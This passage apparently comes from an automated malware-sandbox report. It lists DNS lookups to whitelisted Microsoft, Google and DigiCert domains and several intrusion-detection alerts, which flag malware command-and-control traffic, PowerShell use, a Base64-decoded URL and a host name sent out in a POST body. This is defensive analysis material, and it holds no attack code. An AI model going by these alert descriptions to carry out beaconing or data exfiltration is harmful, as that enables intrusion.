6544 svchost.exe  2.17.190.73:80  ocsp.digicert.com  AKAMAI-AS  DE  whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 2.16.241.19
whitelisted
google.com
  • 142.250.186.110
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.160.131
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
nodejs.org
  • 104.20.3.6
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted

Threats

Columns: class, message (PID and process are not populated in this report).

A Network Trojan was detected: ET MALWARE Generic Malware CnC Activity - (Unix Timestamp In HTTP URI)
Not Suspicious Traffic: ET INFO Windows Powershell User-Agent Usage
Not Suspicious Traffic: ET INFO Windows Powershell User-Agent Usage
A suspicious string was detected: SUSPICIOUS [ANY.RUN] Decoding FromBase64 HTTP URI String
Misc activity: SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body
Potentially Bad Traffic: ET INFO HTTP traffic on port 443 (POST)